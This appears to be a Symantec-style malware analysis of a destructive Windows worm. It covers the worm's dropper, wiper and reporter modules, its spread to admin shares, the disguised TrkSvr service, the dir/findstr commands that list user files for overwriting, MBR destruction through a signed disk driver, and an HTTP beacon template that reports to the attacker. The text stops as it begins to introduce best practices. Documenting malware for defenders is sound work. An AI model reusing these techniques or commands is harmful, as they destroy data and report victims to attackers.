When the worm is executed, it copies itself to the following network shares:
- \\[COMPUTER NAME]\ADMIN$
- \\[COMPUTER NAME]\C$\\WINDOWS
- \\[COMPUTER NAME]\D$\\WINDOWS
- \\[COMPUTER NAME]\E$\\WINDOWS
The worm creates the following files:
- %System%\trksrv.exe
- %System%\netinit.exe
- %System%\drivers\drdisk.sys
- %System%\[NAME SELECTED FROM LIST].exe
The worm deletes the following file:
%System%\drivers\drdisk.sys
The worm is comprised of several components:
- Dropper: main component that drops other modules and is the first to infect the system
- Wiper: module that contains destructive functionality
- Reporter: module that reports infection information back to the attacker
The Dropper component has the following functionality:
- Copies itself to %System%\trksrv.exe
- Drops the following files embedded into resources:
- 64-bit Dropper: %System%\trksrv.exe (contained in the “X509” resource)
- Reporter module: %System%\netinit.exe (contained in the "PKCS7" resource)
- Wiper module: %System%\[NAME SELECTED FROM LIST].exe (contained in the "PKCS12" resource)
Note: [NAME SELECTED FROM LIST] may be one of the following: - caclsrv
- certutl
- clean
- ctrl
- dfrag
- dnslookup
- dvdquery
- event
- extra ct
- findfile
- fsutl
- gpget
- iissrv
- ipsecure
- msinit
- ntx
- ntdsutl
- ntfrsu til
- ntnw
- power
- rdsadmin
- regsys
- routeman
- rrasrv
- sacses
- sfmsc
- sigver
- smbinit
- wcscript
- Copies itself to the following network shares:
- \\[COMPUTER NAME]\ADMIN$
- \\[COMPUTER NAME]\C$\\WINDOWS
- \\[COMPUTER NAME]\D$\\WINDOWS
- \\[COMPUTER NAME]\E$\\WINDOWS
- Creates a job task to execute itself
- Creates the following service to start itself when Windows starts:
- Service: TrkSvr
- DisplayName: Distributed Link Tracking Server
- ImagePath: %System%\trksvr.exe
The Wiper module has the following functionality:
- Deletes the existing driver from the following location and writes a legitimate driver embedded in resources:
%System%\drivers\drdisk.sys - The device driver is a clean disk driver that enables user-land applications to read and write to disk sectors. The driver is used to overwrite the computer's MBR but is not malicious by itself.
- The file is digitally signed by “EldoS Corporation".
- Executes the following commands that collect file names, which will be overwritten and writes them to f1.inf and f2.inf:
- dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
- dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
- dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
- dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
- dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf
Note: Files from f1.inf and f2.inf will be overwritten with a JPEG image that is located in the Wiper module. Overwritten files are rendered useless and cannot be repaired. - The module will overwrite the MBR so that the compromised computer can no longer boot.
The Reporter module is responsible for sending information about the infection to the attacker. Information is sent as an HTTP GET request and is structured as:
http://[DOMAIN]/ajax_modal/modal/data.asp?mydata=[MYDATA]&uid=[UID]&state=[STATE]
The following data is sent to the attacker:
- [DOMAIN] = domain name
- [MYDATA] = specifies how many files were overwritten
- [UID] = IP address of the compromised computer
- [STATE] = random number
Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":
